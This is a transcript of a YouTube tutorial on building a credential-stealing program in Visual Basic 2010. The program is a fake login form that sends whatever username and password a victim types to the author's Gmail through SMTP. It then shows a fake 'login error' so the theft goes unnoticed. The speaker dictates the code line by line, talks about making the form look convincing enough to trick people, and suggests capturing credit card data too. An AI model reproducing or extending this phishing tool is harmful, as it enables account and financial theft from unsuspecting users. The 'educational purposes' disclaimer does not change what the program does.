Alright, hey there YouTube, going to be doing another Visual Basic 2010 tutorial today. What we're going to be working on today is creating a program that utilizes the email system to steal someone's information. This is just for educational purposes, so if you go out and actually cause harm and steal someone's information, I'm not liable for that. That is your own fault. You're going to open up Visual Basic 2010. Change something real quick. You want to hit New Project and create a Windows Form application. On this Windows Form application, you're going to have two labels. Doesn't matter what they say, but just for the sake of, if you were trying to create like a fake login system, you would have them say username and password. You're going to want to have two text boxes. The main purpose of the login information stealing program we're going to be using today is to steal someone's username and password. For the username box, txt user, and for the password box, txt pass. You're also going to have two buttons. It's only necessary to have one. The other one is just for looks, to make the GUI seem a little bit more advanced, add a little bit of depth to the program, so that way it seems more realistic. And the one that is necessary, you're going to want to name it btn button, just the btn login. And then the other one that I have is btn info, the I being capital. Sorry. Now we're going to jump right into the code. Double click on the button. That's where the bulk of this code will be going. Just like the original video of using using mail system, you're going to want to type in imports space system.net.mail. That, like the other version, it has to be above the public class. If it's inside of it, it will not work. Now you're going to want to go into where it says private sub button login. You're going to make some dim statements just like the last time. A little bit less, since there's a lot more variables in this. You're going to want to dim mail as new mail message. This is the exact same code from our last video, and with this code, what it does is it creates the new mail message within Gmail. Alright, and then another one, get rid of the space right here. Another one for dim information as string. Information being what we're going to be stealing from the user that inputs it into this form. In this case, their username and password. Now right here is for the defining of information. Information equals txt user period text space plus symbol space quote mark, some dashes or anything to symbolize that the information you're stealing is no longer the username but now the password. You can make this anything you want. I just use dashes so that way when receiving the email I'll be able to clearly see that this is now the password and this is the username. After you have that, into quote space plus symbol space txt pass dot text. Right. Now we're going to move on to the bulk of the code, defining some stuff. You're going to type in mail dot subject equals space quote information unquote. Just like before, you can make the subject whatever you want it to say, just because only you will be viewing these emails. Pretty much you're just sending an email to yourself using the information that the person is in. So we'll just say account info, because that's what we're going to be trying to steal. Alright, now you're going to enter down mail period to period add. This is who we're going to be sending it to, and this should be your own email address. I'm not going to put mine in because at some point I'm going to have to put my password, and since this is the code, I won't be able to use that little star asterisk hiding method that I showed you in my last video. So it's going to be mail period to add to period add, parenthesis quote, and then you're going to want to enter your Gmail. This version only works for Gmail right as of now. You can change around, change the ports, so that way it'll also accept others. But as of now, since this is just a very simple information stealer, we're just going to have this very basic. So from there, you're going to want to hit, after you have your Gmail in, end quote, end parenthesis, enter, mail.from equals space new space mail address, and then you're going to do parenthesis, quotation mark, your email address again, end quote, end parenthesis. And what that code does is it shows who it's from. So since, say someone enters the username, enters the password, hits login, they have no idea what's going to be going on. They just think they're logging into whatever kind of program you created. But really, both that information, both the txt user.text is going to be sent along with the txt password text that they entered. This will be sent to your email account. It's just how I did it last time. How I entered both my emails is the same for to and from. In your Gmail box, it'll say from yourself or from me or sent to me. And then you're going to enter down for that, do mail period body equal information. This makes it so that this will be the body message and the email that we receive. txt user.text plus the little separator that we created, and then the txt password.text. Keeping it very simple. You can, if you on the login screen, if you wanted to add more stuff, like I'm sure this is originally how like credit card theft got started out. People made simple programs like this and it would just get sent to their email address. If you really wanted, you can have something like that. I do not recommend it because I assume that is illegal. Alright, you're gonna, now that we're done with defining the mail, the different parts of the mail message that we're sending, you're gonna, I like to separate a couple spaces down. You're going to do dim SMTP as new SMTP client opening parenthesis opening quote SMTP period gmail.com end quote end parenthesis. If this code is a little bit hard to view, after viewing my first video I uploaded, I realized that there was a lot of quality loss, so which made it hard to view the code. So I used pastebin and just put the code up in there as well. I prefer you don't just copy and paste, because I'm also trying to do this for educational purposes, so you can maybe get something out of this and learn how to use the mail system within Visual Basic. Alright, from there you're going to want to enter down smtp.enable SSL equal space true, SMTP period credentials equal space new space system period net period network credential opening parenthesis quote, and then you're going to want to enter your email address right here where I have entered your email at gmail.com. Has to be Gmail, remember that. And then you're going to enter your password. I'm not entering this obviously because I don't want someone to steal my account. And then end quote end parenthesis. But when you're separating your email and password, you have to have a comma right here, right at the end quote of your email, followed by a space, and then continue with quote your password unquote, and then end that with a parenthesis. Enter down smtp.port equals quote 587 quote, and then smtp period send parenthesis mail. Alright, now what this code is, I figured it's all pretty much the same thing. This pretty much just activates the ability and what email service we're going to be using for doing our email. It checks to see that it's from Gmail, that we have the correct port. Port is pretty much how it sends and receives mail. Credentials, somewhat obvious, it's your login information. This is obviously your stuff, not what the user stuff is. This is so that way you'll be actually to send the email to yourself. Enable SSL, that just makes it work. And then smtp.send mail obviously will send information, the information dim, to us. I also usually have at the end, after sending this mail, messagebox.show login successful or unsuccessful or error could not reach servers. This just shows to give the user some confirmation that whether or not it worked, that they logged in, or they had an error logging in, or whatever kind of program you're trying to trick people to think it really is. It's just to show that way when they click a button, at least something happens. It'd probably be better off just put messagebox.show login error, and then they'll just give up and not even realize their account just got stolen. And then for my other, that's the main bulk of the code. The next bit I added was just a little bit in depth to make it seem a little bit more realistic, because obviously on any kind of actual form nowadays there isn't just going to be username. There won't be just be a text box for username and password. The GUI is a little bit fancier nowadays, so if you actually wanted to do this, you wouldn't be able to just take this simple program and steal someone's information. I'm sure if there was a little kid on the internet, you might be able to trick them with that, but it'd be hard. It's kind of obvious that a sloppy GUI like this is not a legit thing for whatever you're trying to pull off. So usually for button info, I just put enter your information, be taken to a magical place, and then I just have tutorials by Herp on YouTube. I will debug it, but it will not work since I do not have the password or my credentials or anything defined. But it works. I have the mail message to prove it. I will go to that right now, just so that way you guys can see I'm not just posting out random tutorials. It's actual stuff that I've seen that works. That's not in Gmail. Yep. Oh, lots of pop-ups. Oh crap. I know. This is the wrong one. This is it. I currently have 2 emails on Gmail. One is this one, and it's just for testing out the spam, and then the other one is for my actual email that I plan on using. Alright, this is one that I created using this program. As you can see, this was data entered into the username box. It says, well, hello there, for those of you who can't read. And then you also see the 4 or 5 divider lines I put in there, so that way I am aware of the fact that this is their username, and then the data entered afterwards is their password. So that way I don't have to spend time getting them mixed up, or not really mixed up, but having to spend the time trying to figure out which is which. Just makes it a little bit easier. Unless someone's password involves 5 dash lines. Pretty unlikely, but could happen. And then I do another test saying, as you can see, was entered into the username box, and then there's the divider lines, and then it works. Alright. Hope you guys enjoyed. This was another simple tutorial. I'm going to be posting the code in the description to Pastebin. Leave a comment if there's anything in the future that you would specifically like to see me do a tutorial on, or if you have any questions on this. Alright, enjoy.